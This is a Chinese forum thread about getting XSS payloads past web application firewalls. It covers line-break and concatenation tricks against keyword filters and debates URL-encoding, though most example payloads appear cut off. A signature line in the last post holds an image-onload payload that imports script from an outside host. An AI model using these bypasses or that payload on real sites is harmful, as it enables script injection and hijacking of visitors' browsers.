导航

XSS bypass 小记

#1
有时候waf会针对payload过滤onerror、alert等之类的关键字事件属性,或者把关键字事件替换成其他字符,单独的事件属性不会防护,这时候可以用换行来解决<
如果只单独针对alert做防护的话就可以用拼接的方式来绕过,类似于:<其他事件参考如上
想变强
2020-11-17
#2
能不能麻烦版主把它移到技术讨论区-。-谢谢 @godblack @t00ls管理团队17
想变强
2020-11-17
#3
lz方法没解析成功,换了种
平淡的人生需要些荒诞。
2020-11-19
#4
这网上不是有大把吗(没恶意)
2020-11-20
#5
感觉一般的waf厉害的都能防住,不厉害的怎么都防不住
2020-12-02
#6
回复 4# Anonymous
我想分享一下这个刚好碰到的案例
2021-01-13
#7
回复 3# w7say
这不是同一种方法吗?%2b只是在请求中把+编码了一遍,毕竟+在请求中会被直接解析成空格这种事正常人的大脑还是能理解的
2021-01-15
#8
回复 7# aldys4
你是说我大脑不正常?
2021-06-30
#9
on事件过滤有路子嘛?lz
有志者、事竟成,破釜沉舟
&lt;Img&nbsp;Src=//x.is&nbsp;OnLoad=import(src)&gt;